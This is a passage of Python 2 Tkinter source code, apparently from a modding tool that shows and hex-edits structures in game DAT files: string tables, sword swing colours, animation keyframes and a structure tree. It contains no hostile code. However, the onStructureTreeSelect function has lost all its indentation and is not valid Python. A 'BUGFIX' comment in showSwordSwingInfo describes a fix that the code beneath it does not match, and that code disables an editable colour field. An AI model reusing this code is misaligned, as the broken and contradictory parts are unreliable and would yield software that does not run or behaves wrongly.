    stringTableSize = globalDatFile.getStringTableSize()
    stringTableEnd = 0x20 + globalDatFile.headerInfo['stringTableStart'] + stringTableSize
    locationText = 'Location: 0x{:X} - 0x{:X}'.format( 0x20+globalDatFile.headerInfo['stringTableStart'], stringTableEnd )
    fileSizeText = 'Size: 0x{0:X} ({0:,} bytes)'.format( stringTableSize )
    entriesCountText = 'Total Entries: {}'.format( len(globalDatFile.rootNodes) + len(globalDatFile.referenceNodes) )
    # Check if there's any data beyond the reported end of the file
    totalFileSize = 0x20 + globalDatFile.headerInfo['stringTableStart'] + stringTableSize
    if totalFileSize == globalDatFile.headerInfo['filesize']:
        locationText += ' (file end)'
    ttk.Label( Gui.structurePropertiesFrame.interior, text='String Table', font="-weight bold" ).pack( pady=12 )
    # Add info; need to encapsulate the file details text in a Frame so that pack and grid don't conflict
    emptyWidget = Tk.Frame( relief='flat' ) # This is used as a simple workaround for the labelframe, so we can have no text label with no label gap.
    basicDetailsFrame = ttk.Labelframe( Gui.structurePropertiesFrame.interior, labelwidget=emptyWidget, padding=(20, 4) )
    ttk.Label( basicDetailsFrame, text=locationText, wraplength=Gui.structPropFrameWrapLength ).grid( column=0, row=0, columnspan=2 )
    ttk.Label( basicDetailsFrame, text=fileSizeText, wraplength=Gui.structPropFrameWrapLength ).grid( column=0, row=1, columnspan=2 )
    ttk.Label( basicDetailsFrame, text=entriesCountText, wraplength=Gui.structPropFrameWrapLength ).grid( column=0, row=2, columnspan=2 )
    basicDetailsFrame.pack( pady=0 )
def showSwordSwingInfo():

	""" Treat the Sword Swing Colors struct like a regular struct, and show fields for all of the actual values.
		The 12-byte struct lives in the file's tail data, just after the string table. """

	# Gather data and build a few strings for the GUI
	structOffset = globalDatFile.headerInfo['stringTableStart'] + globalDatFile.getStringTableSize() # Relative to data section start
	hexData = hexlify( globalDatFile.tailData[:0xC] ).upper()
	locationText = 'Location: 0x{:X}'.format( 0x20 + structOffset )
	fileSizeText = 'Size: 0xC (12 bytes)'

	ttk.Label( Gui.structurePropertiesFrame.interior, text='Sword Swing Colors Struct', font="-weight bold" ).pack( pady=12 )

	# Add info; need to encapsulate the file details text in a Frame so that pack and grid don't conflict
	emptyWidget = Tk.Frame( relief='flat' ) # This is used as a simple workaround for the labelframe, so we can have no text label with no label gap.
	basicDetailsFrame = ttk.Labelframe( Gui.structurePropertiesFrame.interior, labelwidget=emptyWidget, padding=(20, 4) )
	ttk.Label( basicDetailsFrame, text=locationText, wraplength=Gui.structPropFrameWrapLength ).grid( column=0, row=0, columnspan=2 )
	ttk.Label( basicDetailsFrame, text=fileSizeText, wraplength=Gui.structPropFrameWrapLength ).grid( column=0, row=1, columnspan=2 )
	basicDetailsFrame.pack( pady=0 )

	# Create a new frame for displaying field names and hex values
	hexDisplayFrame = ttk.Frame( Gui.structurePropertiesFrame.interior, padding='0 12 0 12' ) # Left, Top, Right, Bottom.

	# Create the first column (field name labels)
	ttk.Label( hexDisplayFrame, text='Identifier:' ).grid( column=0, row=0, padx=(0, 7), pady=0, sticky='e' )
	ttk.Label( hexDisplayFrame, text='Ending Alpha:' ).grid( column=0, row=1, padx=(0, 7), pady=0, sticky='e' )
	ttk.Label( hexDisplayFrame, text='Starting Alpha:' ).grid( column=0, row=2, padx=(0, 7), pady=0, sticky='e' )
	ttk.Label( hexDisplayFrame, text='Edge Red Channel:' ).grid( column=0, row=3, padx=(0, 7), pady=0, sticky='e' )
	ttk.Label( hexDisplayFrame, text='Edge Green Channel:' ).grid( column=0, row=4, padx=(0, 7), pady=0, sticky='e' )
	ttk.Label( hexDisplayFrame, text='Edge Blue Channel:' ).grid( column=0, row=5, padx=(0, 7), pady=0, sticky='e' )
	ttk.Label( hexDisplayFrame, text='Center Red Channel:' ).grid( column=0, row=6, padx=(0, 7), pady=0, sticky='e' )
	ttk.Label( hexDisplayFrame, text='Center Green Channel:' ).grid( column=0, row=7, padx=(0, 7), pady=0, sticky='e' )
	ttk.Label( hexDisplayFrame, text='Center Blue Channel:' ).grid( column=0, row=8, padx=(0, 7), pady=0, sticky='e' )

	# Add a read-only field for the identifier # highlightbackground is the BORDER color when not focused!
	hexEntry = Tk.Entry( hexDisplayFrame, width=10, justify='center',
		relief='flat', highlightbackground='#b7becc', borderwidth=1, highlightthickness=1, highlightcolor='#0099f0' )
	hexEntry.insert( 0, hexData[:8] )
	hexEntry['state'] = 'disabled'
	hexEntry.grid( column=1, row=0, pady=0, padx=(0,2) )

	# BUGFIX: insert the value BEFORE disabling the widget. Tkinter silently ignores
	# insert() on a disabled Entry, so this field previously displayed empty.
	hexEntry = HexEditEntry( hexDisplayFrame, structOffset+8, 1, 'B', 'Ending Alpha' )
	hexEntry.insert( 0, hexData[8:10] )
	hexEntry.configure( state='disabled' )
	hexEntry.grid( column=1, row=1, pady=0, padx=(0,2) )
	hexEntry = HexEditEntry( hexDisplayFrame, structOffset+9, 1, 'B', 'Starting Alpha' )
	hexEntry.insert( 0, hexData[10:12] )
	hexEntry.grid( column=1, row=2, pady=0, padx=(0,2) )
	hexEntry = HexEditEntry( hexDisplayFrame, structOffset+0xA, 1, 'B', 'Edge Color Red Channel' )
	hexEntry.insert( 0, hexData[12:14] )
	hexEntry.grid( column=1, row=3, pady=0, padx=(0,2) )
	hexEntry = HexEditEntry( hexDisplayFrame, structOffset+0xB, 1, 'B', 'Edge Color Green Channel' )
	hexEntry.insert( 0, hexData[14:16] )
	hexEntry.grid( column=1, row=4, pady=0, padx=(0,2) )
	hexEntry = HexEditEntry( hexDisplayFrame, structOffset+0xC, 1, 'B', 'Edge Color Blue Channel' )
	hexEntry.insert( 0, hexData[16:18] )
	hexEntry.grid( column=1, row=5, pady=0, padx=(0,2) )
	hexEntry = HexEditEntry( hexDisplayFrame, structOffset+0xD, 1, 'B', 'Center Color Red Channel' )
	hexEntry.insert( 0, hexData[18:20] )
	hexEntry.grid( column=1, row=6, pady=0, padx=(0,2) )
	hexEntry = HexEditEntry( hexDisplayFrame, structOffset+0xE, 1, 'B', 'Center Color Green Channel' )
	hexEntry.insert( 0, hexData[20:22] )
	hexEntry.grid( column=1, row=7, pady=0, padx=(0,2) )
	hexEntry = HexEditEntry( hexDisplayFrame, structOffset+0xF, 1, 'B', 'Center Color Blue Channel' )
	hexEntry.insert( 0, hexData[22:24] )
	hexEntry.grid( column=1, row=8, pady=0, padx=(0,2) )

	hexDisplayFrame.pack()
def show20XXsupplementalData():

	""" Shows location and size details for the 20XX HP supplemental data,
		which resides immediately after the file's string table. """

	# The supplemental data starts right after the string table (offset relative to data section start)
	relativeOffset = globalDatFile.headerInfo['stringTableStart'] + globalDatFile.getStringTableSize()
	locationText = 'Location: 0x{:X}'.format( 0x20 + relativeOffset )
	fileSizeText = 'Size: 0x{:X}'.format( globalDatFile.headerInfo['filesize'] - relativeOffset )

	ttk.Label( Gui.structurePropertiesFrame.interior, text='20XX HP Supplemental Data', font="-weight bold" ).pack( pady=12 )

	# Encapsulate the details in a Labelframe so pack and grid don't conflict
	noLabelWidget = Tk.Frame( relief='flat' ) # Workaround to get a labelframe with no label text and no label gap
	detailsFrame = ttk.Labelframe( Gui.structurePropertiesFrame.interior, labelwidget=noLabelWidget, padding=(20, 4) )
	ttk.Label( detailsFrame, text=locationText, wraplength=Gui.structPropFrameWrapLength ).grid( column=0, row=0, columnspan=2 )
	ttk.Label( detailsFrame, text=fileSizeText, wraplength=Gui.structPropFrameWrapLength ).grid( column=0, row=1, columnspan=2 )
	detailsFrame.pack( pady=0 )
def showKnownStructProperties( structure, guiFrame ):

	""" Builds a three-column property table in guiFrame for a structure whose fields are
		known (i.e. structure.fields and structure.formatting are defined): field name,
		raw-hex edit entry, and a decoded-value column. The decoded column becomes a
		navigation link for pointers, a 'Decode' button for flag fields, a color swatch
		for RGBA fields, or an editable value entry otherwise. """

	# tic = time.clock()
	structValues = structure.getValues()
	relativeFieldOffset = 0				# Offset within the struct
	absoluteFieldOffset = structure.offset	# Offset within the file's data section

	# Determine the per-entry size for array/table structs, used to visually group rows
	if structure.entryCount > 1:
		entrySize = structure.length / structure.entryCount
	else: entrySize = 0

	for i, field in enumerate( structure.fields ):
		# Collect info on this field
		propertyName = field.replace( '_', ' ' )
		fieldFormatting = structure.formatting[i+1]	# [0] is presumably the byte-order char — TODO confirm
		fieldByteLength = struct.calcsize( fieldFormatting )
		fieldValue = structValues[i]

		# If this is an array or table structure, add a little bit of spacing before each group of field entries
		if entrySize and ( relativeFieldOffset % entrySize == 0 ) and i > 0:
			verticalPadding = ( 10, 0 )
			firstOfNextEntry = True
		else:
			verticalPadding = ( 0, 0 )
			firstOfNextEntry = False

		# Add the property/field name, and a tooltip for its struct & file offsets
		if field: # May be an empty string if this field is unknown
			if firstOfNextEntry and entrySize > 4:
				# Prefix multi-field entries with their 1-based entry number (Py2 integer division)
				fieldLabel = ttk.Label( guiFrame, text='{} - {}:'.format((relativeFieldOffset/entrySize)+1, propertyName), wraplength=200 )
			else:
				fieldLabel = ttk.Label( guiFrame, text=propertyName + ':', wraplength=200 )
			fieldLabel.grid( column=0, row=i, padx=(0, 7), sticky='e', pady=verticalPadding )
			ToolTip( fieldLabel, text='Offset in struct: 0x{:X}\nOffset in file: 0x{:X}'.format(relativeFieldOffset, 0x20+absoluteFieldOffset), delay=300 )
		else:
			# Unknown field; label it by its offset within the struct instead
			fieldLabel = ttk.Label( guiFrame, text=uHex( relativeFieldOffset ) + ':', wraplength=200 )
			fieldLabel.grid( column=0, row=i, padx=(0, 7), sticky='e', pady=verticalPadding )
			ToolTip( fieldLabel, text='Offset in file: 0x{:X}'.format(0x20+absoluteFieldOffset), delay=300 )

		# Add an editable field for the raw hex data
		hexEntry = HexEditEntry( guiFrame, absoluteFieldOffset, fieldByteLength, fieldFormatting, propertyName )
		hexEntry.insert( 0, hexlify(structure.data[relativeFieldOffset:relativeFieldOffset+fieldByteLength]).upper() )
		hexEntry.bind( '<Return>', updateEntryHex )
		hexEntry.grid( column=1, row=i, padx=(0,2), pady=verticalPadding )

		# Add something for the decoded value column
		if absoluteFieldOffset in globalDatFile.pointerOffsets: # It's a pointer
			PointerLink( guiFrame, fieldValue ).grid( column=2, row=i, pady=verticalPadding )
		elif 'Flags' in field:
			# Add the flag "Decode" button label, and the window creator handler
			flagsLabel = ttk.Label( guiFrame, text='Decode', foreground='#00F', cursor='hand2' )
			flagsLabel.grid( column=2, row=i, pady=verticalPadding )
			# Default args freeze the current loop values for the lambda (late-binding workaround)
			flagsLabel.bind( '<1>', lambda e, s=structure, fO=absoluteFieldOffset, vI=i: FlagDecoder(s, fO, vI) )

		# Add a color swatch if it's an RGBA color (this shows the color and makes for easy editing)
		elif field.startswith( 'RGBA' ):
			# Get the individual RGBA values from the field's value
			fieldValueHexString = '{0:0{1}X}'.format( fieldValue, 8 ) # Avoids the '0x' and 'L' appendages brought on by the hex() function. pads to 8 characters
			hexEntry.colorSwatch = ColorSwatch( guiFrame, fieldValueHexString, hexEntry )
			hexEntry.colorSwatch.grid( column=2, row=i, pady=verticalPadding )
		else:
			# Add an editable field for this field's actual decoded value (and attach the hex edit widget for later auto-updating)
			valueEntry = HexEditEntry( guiFrame, absoluteFieldOffset, fieldByteLength, fieldFormatting, propertyName )
			valueEntry.insert( 0, fieldValue )
			# Cross-link the two entries so editing one can refresh the other
			valueEntry.hexEntryWidget = hexEntry
			hexEntry.valueEntryWidget = valueEntry
			# Bind an event handler (pressing 'Enter' to save)
			valueEntry.bind( '<Return>', updateEntryValue )
			valueEntry.grid( column=2, row=i, pady=verticalPadding )

		relativeFieldOffset += fieldByteLength
		absoluteFieldOffset += fieldByteLength
	# toc = time.clock()
	# print 'time to draw known struct properties:', toc - tic
def showUnknownStructProperties( structure, guiFrame ):

	""" Builds a simple hex-editing table for a structure with no known field layout:
		one row per 4-byte word, with pointers labeled and given a navigation link. """

	fieldOffset = 0
	tableRow = 0

	for i in range( len(structure.data) / 4 ): # Py2 integer division; one row per 32-bit word
		absoluteFieldOffset = structure.offset + fieldOffset
		# Test pointer membership once per word (was previously checked twice)
		isPointer = absoluteFieldOffset in globalDatFile.pointerOffsets

		# Construct the field name for this property
		if isPointer:
			hexString = uHex( fieldOffset )
			numberOfSpaces = 5 - len( hexString )
			fieldName = hexString + numberOfSpaces * ' ' + ' (Pointer):'
		else:
			fieldName = uHex( fieldOffset ) + ':'

		# Add the property/field name, and a tooltip for its file offset
		fieldLabel = ttk.Label( guiFrame, text=fieldName )
		fieldLabel.grid( column=0, row=tableRow, padx=(0, 7), pady=0, sticky='w' )
		ToolTip( fieldLabel, text='Offset in file: 0x{:X}'.format(0x20+structure.offset+fieldOffset), delay=300 )

		# Add an editable field for the raw hex data
		hexEntry = HexEditEntry( guiFrame, absoluteFieldOffset, 4, None, structure.name )
		hexEntry.insert( 0, hexlify(structure.data[fieldOffset:fieldOffset+4]).upper() )
		hexEntry.bind( '<Return>', updateEntryHex )
		hexEntry.grid( column=1, row=tableRow, pady=0 )

		# Add a quick-navigation link for pointers (now gridded by tableRow, for
		# consistency with the other widgets in this row; i was only coincidentally equal)
		if isPointer:
			fieldValue = structure.getValues()[i]
			PointerLink( guiFrame, fieldValue ).grid( column=2, row=tableRow, pady=0, padx=7 )

		fieldOffset += 4
		tableRow += 1
def showFrameDataStringParsing( frameObjString, structTable, infoPaneInterior ):

	""" Parses an animation FObjString (frame data string) and displays its track type,
		interpolation mode, data/slope encodings, and (for reasonably small strings)
		a full table of its keyframes. Also adds links to view the keyframes in
		CSV/TSV form. structTable is unused here — TODO confirm it can be dropped. """

	# Get some info from the parent struct (a FObjDesc)
	parentOffset = frameObjString.getAnyDataSectionParent()
	parentStruct = globalDatFile.getStruct( parentOffset )
	_, _, startFrame, _, dataTypeAndScale, slopeDataTypeAndScale, _, _ = parentStruct.getValues()

	# Create a new frame to attach basic info to (since we want to use grid without interfering with pack)
	frameDetailsGrid = ttk.Frame( infoPaneInterior )
	ttk.Label( frameDetailsGrid, text='General Track Type:' ).grid( column=0, row=0, sticky='e', padx=(0, 10) )
	ttk.Label( frameDetailsGrid, text='Specific Track Type:' ).grid( column=0, row=1, sticky='e', padx=(0, 10) )

	# Add the general (and specific) track type
	trackNames = frameObjString.identifyTrack()
	ttk.Label( frameDetailsGrid, text=trackNames[0] ).grid( column=1, row=0, sticky='w' )
	ttk.Label( frameDetailsGrid, text=trackNames[1] ).grid( column=1, row=1, sticky='w' )

	# Parse the FObjString
	interpolationID, arrayCount, keyFrames = frameObjString.parse()

	# Display the opcode's interpolation type and array/keyframe count
	ttk.Label( frameDetailsGrid, text='Interpolation:' ).grid( column=0, row=2, sticky='e', padx=(0, 10) )
	ttk.Label( frameDetailsGrid, text='Keyframe Count:' ).grid( column=0, row=3, sticky='e', padx=(0, 10) )
	ttk.Label( frameDetailsGrid, text=frameObjString.interpolationTypes[interpolationID] ).grid( column=1, row=2, sticky='w' )
	ttk.Label( frameDetailsGrid, text=arrayCount ).grid( column=1, row=3, sticky='w' )

	# Display the data types used in the string
	ttk.Label( frameDetailsGrid, text='Data Type:' ).grid( column=0, row=4, sticky='e', padx=(0, 10) )
	ttk.Label( frameDetailsGrid, text='Data Scale:' ).grid( column=0, row=5, sticky='e', padx=(0, 10) )
	# Interpolation IDs 0 and 5 apparently carry no data values — TODO confirm against the parser
	if interpolationID == 0 or interpolationID == 5:
		ttk.Label( frameDetailsGrid, text='Not Used' ).grid( column=1, row=4, sticky='w' )
		ttk.Label( frameDetailsGrid, text='Not Used' ).grid( column=1, row=5, sticky='w' )
	else:
		dataType = dataTypeAndScale >> 5 # Use the first (left-most) 3 bits
		dataScale = 1 << ( dataTypeAndScale & 0b11111 ) # Use the last 5 bits
		ttk.Label( frameDetailsGrid, text=parentStruct.dataTypes[dataType][0] + 's' ).grid( column=1, row=4, sticky='w' )
		ttk.Label( frameDetailsGrid, text='1 / {} ({})'.format(dataScale, 1.0/dataScale) ).grid( column=1, row=5, sticky='w' )

	# Display the slope/tangent data types used in the string
	ttk.Label( frameDetailsGrid, text='Slope Data Type:' ).grid( column=0, row=6, sticky='e', padx=(0, 10) )
	ttk.Label( frameDetailsGrid, text='Slope Data Scale:' ).grid( column=0, row=7, sticky='e', padx=(0, 10) )
	if interpolationID == 4 or interpolationID == 5:
		slopeDataType = slopeDataTypeAndScale >> 5 # Use the first (left-most) 3 bits
		slopeDataScale = 1 << ( slopeDataTypeAndScale & 0b11111 ) # Use the last 5 bits
		ttk.Label( frameDetailsGrid, text=parentStruct.dataTypes[slopeDataType][0] + 's' ).grid( column=1, row=6, sticky='w' )
		ttk.Label( frameDetailsGrid, text='1 / {} ({})'.format(slopeDataScale, 1.0/slopeDataScale) ).grid( column=1, row=7, sticky='w' )
	else:
		ttk.Label( frameDetailsGrid, text='Not Used' ).grid( column=1, row=6, sticky='w' )
		ttk.Label( frameDetailsGrid, text='Not Used' ).grid( column=1, row=7, sticky='w' )
	frameDetailsGrid.pack( pady=(14, 0) )

	# Start a new frame for the keyframe data, and create a table header
	if len( keyFrames ) < 40: # Avoid loading up the GUI too much; could bog it down. Needs testing
		keyFramesFrame = ttk.Frame( infoPaneInterior )
		ttk.Label( keyFramesFrame, text='Keyframes / States', font="-weight bold" ).grid( column=0, row=0, columnspan=2 )
		ttk.Label( keyFramesFrame, text='Start Frame:' ).grid( column=2, row=1, padx=3 )
		ttk.Label( keyFramesFrame, text=startFrame ).grid( column=3, row=1, padx=3 )
		ttk.Label( keyFramesFrame, text='Keyframe:' ).grid( column=0, row=2, padx=3 )
		ttk.Label( keyFramesFrame, text='Data Value:' ).grid( column=1, row=2, padx=3 )
		ttk.Label( keyFramesFrame, text='Slope Value:' ).grid( column=2, row=2, padx=3 )
		ttk.Label( keyFramesFrame, text='Target Frame:' ).grid( column=3, row=2, padx=3 )

		# Display the keyframe data; each keyframe's target frame is the running sum of frame waits
		frameCount = startFrame
		csvFormatText = []
		row = 3
		for dataValue, tangent, frameWait in keyFrames:
			ttk.Label( keyFramesFrame, text=row - 2 ).grid( column=0, row=row ) # 1-based keyframe number
			ttk.Label( keyFramesFrame, text=dataValue ).grid( column=1, row=row )
			ttk.Label( keyFramesFrame, text=tangent ).grid( column=2, row=row )
			ttk.Label( keyFramesFrame, text=frameCount ).grid( column=3, row=row )
			csvFormatText.append( '{}, {}, {}'.format(dataValue, tangent, frameCount) )
			frameCount += frameWait
			row += 1

		# Set the end frame, taken from the grandparent Animation Object
		animParentOffset = parentStruct.getAnyDataSectionParent()
		animParentStruct = globalDatFile.getStruct( animParentOffset )
		endFrame = animParentStruct.getValues( 'End_Frame' )
		ttk.Label( keyFramesFrame, text='End Frame:' ).grid( column=2, row=row )
		ttk.Label( keyFramesFrame, text=endFrame ).grid( column=3, row=row )
		keyFramesFrame.pack( pady=(14, 0) )
	else:
		ttk.Label( infoPaneInterior, text='Avoiding Full Analysis;\nlarge array length detected.' ).pack( pady=(14, 0) )
		# NOTE(review): this branch emits startFrame for every row rather than the running
		# frame count used above — confirm whether that's intentional for the CSV export
		csvFormatText = []
		for dataValue, tangent, frameWait in keyFrames:
			csvFormatText.append( '{}, {}, {}'.format(dataValue, tangent, startFrame) )

	# Repackage the data so that it can be collected and used by the user in other ways
	csvFormatText = '\n'.join( csvFormatText )
	label = ttk.Label( infoPaneInterior, text='Show Keyframes in CSV Format', foreground='#00F', cursor='hand2' )
	label.pack( pady=(9, 0) )
	label.bind( '<1>', lambda event, message=csvFormatText, title=frameObjString.name + ' Keyframes': cmsg(message, title) )
	label = ttk.Label( infoPaneInterior, text='Show Keyframes in TSV Format', foreground='#00F', cursor='hand2' )
	label.pack( pady=(3, 0) )
	label.bind( '<1>', lambda event, message=csvFormatText.replace(', ', '\t'), title=frameObjString.name + ' Keyframes': cmsg(message, title) )
def onStructureTreeSelect( event ):
""" This is called upon a structure in the Structure Tree being selected.
This will populate the right-hand panel with the structure's name and basic
information (including handlers for clicking on some of them), and will then kick
off a separate function for displaying the structure's values and their offsets. """
# Destroy the existing widgets in the properties frame
Gui.structurePropertiesFrame.clear()
iid = str( Gui.fileStructureTree.selection()[0] )
itemName = Gui.fileStructureTree.item( iid, 'text' )
Gui.structurePropertiesFrame.structTable = None
if itemName == 'File Header':
showFileProperties()
return
elif itemName == 'Relocation Table':
showRelocationTableInfo()
return
elif itemName == 'Root Nodes Table':
showNodeTableInfo( itemName )
return
elif itemName == 'Reference Nodes Table':
showNodeTableInfo( itemName )
return
elif itemName == 'String Table':
showStringTableInfo()
return
elif itemName == 'Sword Swing Colors':
showSwordSwingInfo()
return
elif itemName == '20XX HP Supplemental Data':
show20XXsupplementalData()
return
elif itemName == 'Orphan Structures':
orphanNotes = ( 'Orphan structures are not attached to the file structure tree in the usual way (i.e. having '
'parents that lead all the way up to the root/reference node tables).' )
ttk.Label( Gui.structurePropertiesFrame.interior, text=orphanNotes, wraplength=Gui.structPropFrameWrapLength ).pack( pady=(36,0) )
return
# Get the struct offset and the initialized struct object itself
structOffset = int( iid.split( '/' )[-1] )
structure = globalDatFile.structs[structOffset]
# Display the structure's name and label
ttk.Label( Gui.structurePropertiesFrame.interior, text=structure.name, font="-weight bold" ).pack( pady=(12,0) )
if structure.label:
ttk.Label( Gui.structurePropertiesFrame.interior, text=structure.label, font="-weight bold" ).pack( pady=(3, 0) )
# Add a "button" for help text
helpText = ( 'Offsets shown on the left (for unknown structs) are absolute file offsets. However, keep in mind that pointers '
"shown on the right, the actual values in the file, are relative to the file's data section (meaning they do not "
'account for the 0x20 file header, and will be that much smaller than the actual file offset).\n\n'
'If a structure has multiple parents, it may appear under multiple branches, thus the addition of all branch'
'sizes will be larger than the total file size.' )
addHelpBtn( helpText )
# Gather struct info
structParents = structure.getParents( includeNodeTables=True )
structSiblings = structure.getSiblings()
structChildren = structure.getChildren()
# Add general struct info; need to encapsulate these in a Frame so that pack and grid don't conflict
emptyWidget = Tk.Frame( relief='flat' ) # This is used as a simple workaround for the labelframe, so we can have no text label with no label gap.
basicDetailsFrame = ttk.Labelframe( Gui.structurePropertiesFrame.interior, labelwidget=emptyWidget, padding=(20, 4) )
# Get the structure depth
if iid.startswith( 'orphans' ):
structDepthText = 'N/A'
else:
depth = structure.getStructDepth()
if depth:
fileDepth, siblingIndex = depth
structDepthText = '{}, {}'.format( fileDepth, siblingIndex )
else: # Failsafe; not expected
structDepthText = str(getTreeviewDepth( Gui.fileStructureTree, iid )) + ', n/a'
# General Struct Info, column 1 (parents/sibs/children text)
ttk.Label( basicDetailsFrame, text='Parents:' ).grid( column=0, row=0, sticky='e', padx=(0, 5) )
ttk.Label( basicDetailsFrame, text='Siblings:' ).grid( column=0, row=1, sticky='e', padx=(0, 5) )
ttk.Label( basicDetailsFrame, text='Children:' ).grid( column=0, row=2, sticky='e', padx=(0, 5) )
# General Struct Info, column 2 (parents/sibs/children info/links)
if structParents:
structParentsString = ', '.join([ uHex(0x20+offset) for offset in structParents ])
parentsCountLabel = ttk.Label( basicDetailsFrame, text=len(structParents), foreground='#00F', cursor='hand2' )
#showBtn = ( 'Show', showStructInStructuralAnalysis(targetStructOffset) )
parentsCountLabel.bind( '<1>', lambda event, message=structParentsString, title=structure.name + ' Parents': cmsg(message, title) )
else:
parentsCountLabel = ttk.Label( basicDetailsFrame, text='0' )
if structSiblings:
structSiblingsString = ', '.join([ uHex(0x20+offset) for offset in structSiblings ])
siblingsCountLabel = ttk.Label( basicDetailsFrame, text=len(structSiblings), foreground='#00F', cursor='hand2' )
siblingsCountLabel.bind( '<1>', lambda event, message=structSiblingsString, title=structure.name + ' Siblings': cmsg(message, title) )
else:
siblingsCountLabel = ttk.Label( basicDetailsFrame, text='0' )
if structChildren:
structChildrenString = ', '.join([ uHex(0x20+offset) for offset in structChildren ])
childrenCountLabel = ttk.Label( basicDetailsFrame, text=len(structChildren), foreground='#00F', cursor='hand2' )
childrenCountLabel.bind( '<1>', lambda event, message=structChildrenString, title=structure.name + ' Children': cmsg(message, title) )
else:
childrenCountLabel = ttk.Label( basicDetailsFrame, text='0' )
parentsCountLabel.grid( column=1, row=0, sticky='w' )
siblingsCountLabel.grid( column=1, row=1, sticky='w' )
childrenCountLabel.grid( column=1, row=2, sticky='w' )
# General Struct Info, column 3 (size/position text)
ttk.Label( basicDetailsFrame, text='Length:' ).grid( column=2, row=0, sticky='e', padx=(20,5) )
ttk.Label( basicDetailsFrame, text='Struct Depth:' ).grid( column=2, row=1, sticky='e', padx=(20,5) )
if structChildren:
ttk.Label( basicDetailsFrame, text='Branch Size:' ).grid( column=2, row=2, sticky='e', padx=(20,5) )
# General Struct Info, column 4 (size/position info)
structLengthText = uHex( structure.length ) if structure.length != -1 else 'Unknown'
ttk.Label( basicDetailsFrame, text=structLengthText ).grid( column=3, row=0, sticky='w' )
ttk.Label( basicDetailsFrame, text=structDepthText ).grid( column=3, row=1, sticky='w' )
# Branch Size Info
if structChildren:
if structure.branchSize == -1: # Not yet known; leave it up to the user to begin calculation
def calculateBranchSize( event ): # This can take some time (5-10 seconds), so lets not make it happen automatically
branchSize = uHex( structure.getBranchSize() )
branchSizeValueLabel['text'] = branchSize
branchSizeValueLabel['foreground'] = Gui.globalFontColor
branchSizeValueLabel['cursor'] = ''
branchSizeValueLabel = ttk.Label( basicDetailsFrame, text='[Calculate]', foreground='#00F', cursor='hand2' )
branchSizeValueLabel.grid( column=3, row=2, sticky='w' )
branchSizeValueLabel.bind( '<1>', calculateBranchSize )
else:
ttk.Label( basicDetailsFrame, text=uHex(structure.branchSize) ).grid( column=3, row=2, sticky='w' )
if structure.entryCount != -1:
paddingNotice = ttk.Label( basicDetailsFrame, text='Entry Count: {}'.format(structure.entryCount) )
paddingNotice.grid( column=0, row=3, columnspan=4, pady=(0, 0) )
if structure.padding:
paddingNotice = ttk.Label( basicDetailsFrame, text='Trailing Padding: 0x{:X}'.format(structure.padding) )
paddingNotice.grid( column=0, row=4, columnspan=4, pady=(0, 0) )
basicDetailsFrame.pack( pady=(16, 0) )
# Nothing else to show for raw image and palette data blocks
if issubclass( structure.__class__, hsdStructures.DataBlock ) and not structure.__class__ == hsdStructures.FrameDataBlock:
return
elif structure.length > 0x1000:
print 'struct is > 0x1000 bytes. skipping struct unpacking.' # This would be slow
return
# Build a table showing the fields and values in this structure
Gui.structurePropertiesFrame.structTable = structTable = ttk.Frame( Gui.structurePropertiesFrame.interior, padding='0 12 0 12' ) # Left, Top, Right, Bottom.
if structure.__class__ == hsdStructures.FrameDataBlock:
showFrameDataStringParsing( structure, structTable, Gui.structurePropertiesFrame.interior )
elif structure.fields:
showKnownStructProperties( structure, structTable )
else:
if structure.padding != 0:
print 'Non-0 padding for unknown struct; {}. Something may have initialized improperly.'.format( structure.padding )
showUnknownStructProperties( structure, structTable )
structTable.pack()
def addSingleStructure( structure, structIid, parentIid, makeExpanded=False ):

	""" Inserts a single structure into the Structural Analysis treeview (if not already
		present), choosing a display name from the struct's label, class, and depth.
		If the item already exists, it's simply expanded when makeExpanded is True. """

	if Gui.fileStructureTree.exists( structIid ):
		# Already in the tree; just make sure it's open if requested
		if makeExpanded:
			Gui.fileStructureTree.item( structIid, open=True )
		return

	displayName = ''
	fileDepth, siblingId = structure.getStructDepth() # NOTE(review): assumes a non-None depth here — confirm

	# Check if this is a stage file General Point, to modify the name shown
	if fileDepth == 4 or fileDepth == 5:
		iidParts = structIid.split( '/' )
		if len( iidParts ) > 3: # Failsafe
			arrayCandidate = globalDatFile.getStruct( int(iidParts[3]) )
			if arrayCandidate.__class__ == hsdStructures.MapGeneralPointsArray:
				if fileDepth == 4 and structure.__class__ == hsdStructures.JointObjDesc:
					displayName = 'General Points'
				elif fileDepth == 5:
					displayName = structure.getGeneralPointType() or 'General Point'

	# Fall back to the struct's label, or its name minus the offset suffix
	if not displayName:
		if structure.label:
			displayName = structure.label
		else:
			displayName = ' '.join( structure.name.split()[:-1] ) # Drops just the offset from the name (it's already in the GUI and thus redundant here)
			if siblingId != 0:
				displayName += ' ' + str( siblingId + 1 )

	Gui.fileStructureTree.insert( parentIid, 'end', iid=structIid, text=displayName, values=uHex(0x20 + structure.offset), open=makeExpanded )
	Gui.fileStructureTree.allIids.append( structIid )
def addSiblingStructures( structure, parentIid ):

	""" Adds each sibling of the given structure to the treeview, under the same parent item. """

	for siblingOffset in structure.getSiblings():
		siblingStruct = globalDatFile.getStruct( siblingOffset )
		addSingleStructure( siblingStruct, '{}/{}'.format(parentIid, siblingOffset), parentIid )
def addChildStructures( structure, parentIid ):

	""" Adds each child of the given structure to the treeview, nested under the given parent item. """

	for childOffset in structure.getChildren():
		childStruct = globalDatFile.getStruct( childOffset, structure.offset )
		addSingleStructure( childStruct, '{}/{}'.format(parentIid, childOffset), parentIid )
def addTreeFragment( parentIid, structure=None, structOffset=-1, parentOffset=-1, structDepth=None ):

	""" Adds part of a family or local node group to the treeview, including the initial item or
		structure given. If the target struct will be visible, this also adds the target
		structure's siblings and children. If a structure is not provided, structOffset is required. """

	if not structure:
		structure = globalDatFile.getStruct( structOffset, parentOffset, structDepth )
	assert structure, 'Unable to create or get a structure for ' + uHex(0x20+structOffset)

	# Attach the target struct itself
	targetIid = '{}/{}'.format( parentIid, structure.offset )
	addSingleStructure( structure, targetIid, parentIid )

	# If this item will be visible (i.e. the parent item is open), its siblings and children should be present
	if Gui.fileStructureTree.item( parentIid, 'open' ):
		addSiblingStructures( structure, parentIid )
		addChildStructures( structure, targetIid )
def growStructuralAnalysisTree( event, iid=None ):

	""" Initializes and adds lower-level structures beneath an existing item in the
		Structural Analysis treeview. The given/clicked item is expected to already have
		its children created (though not necessarily the children's siblings, for
		performance), so this mostly fills in those siblings plus the grandchildren —
		which gives each child a '+' icon so it can subsequently be browsed. """

	if not iid:
